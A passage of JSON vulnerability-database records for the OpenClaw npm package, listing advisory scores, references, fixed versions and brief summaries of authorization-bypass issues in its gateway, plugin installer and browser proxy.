openclaw/security/advisories/GHSA-cwq8-6f96-g3q4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41377","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41377"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-fail-open-security-scan-bypass-in-plugin-installation","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-fail-open-security-scan-bypass-in-plugin-installation"},{"reference_url":"https://github.com/advisories/GHSA-cwq8-6f96-g3q4","reference_id":"GHSA-cwq8-6f96-g3q4","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cwq8-6f96-g3q4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41377","GHSA-cwq8-6f96-g3q4"],"risk_score":2.3,"exploitability":"0.5","weighted_severity":"4.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kzgh-7f6h-kfd1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50775?format=json","vulnerability_id":"VCID-m46m-y19r-2kd2","summary":"OpenClaw: `operator.write` chat.send could reach admin-only config writes\nA gateway client authenticated with `operator.write` could route `/config set` or `/config unset` through `chat.send` and reach persistent config mutation even though direct config RPC methods are admin-scoped.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5f8f58ae25e2a78f31b06edcf26532d634ca554e","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/5f8f58ae25e2a78f31b06edcf26532d634ca554e"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://github.com/advisories/GHSA-hfpr-jhpq-x4rm","reference_id":"GHSA-hfpr-jhpq-x4rm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hfpr-jhpq-x4rm"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hfpr-jhpq-x4rm","reference_id":"GHSA-hfpr-jhpq-x4rm","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hfpr-jhpq-x4rm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["GHSA-hfpr-jhpq-x4rm"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-m46m-y19r-2kd2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89934?format=json","vulnerability_id":"VCID-ma62-gtan-97au","summary":"## Impact\n\nOpenClaw `node.invoke(browser.proxy)` bypasses `browser.request` persistent profile-mutation guard.\n\nnode.invoke(browser.proxy) could mutate persistent browser profiles through a path that bypassed the browser.request guard.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= v2026.04.01`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @nicky-cc  of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for 